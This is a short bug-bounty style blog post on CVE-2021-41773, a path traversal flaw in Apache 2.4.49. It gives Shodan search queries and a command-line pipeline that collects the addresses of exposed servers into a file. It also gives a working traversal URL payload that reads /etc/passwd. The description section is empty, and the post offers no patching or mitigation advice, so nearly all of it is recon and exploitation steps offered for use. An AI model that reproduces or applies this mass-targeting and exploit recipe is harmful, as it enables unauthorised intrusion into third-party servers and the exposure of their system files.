Apache 0 Day !!

Hello Hunters! Today’s topic is about CVE 2021–41773. Without further delay let’s get start.

Description:

Recon:

  • Search Query 1: Apache 2.4.49
  • Search Query 2: Server: Apache/2.4.49

Shodan CLI:

shodan search “Apache 2.4.49” --fields ip_str,port --separator “ “ | awk ‘{print $1”:”$2}’ | tee -a apache0day.txt

Exploitation:

target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Template: Link

Instagram: th3.d1p4k

Twitter: Dipak Panchal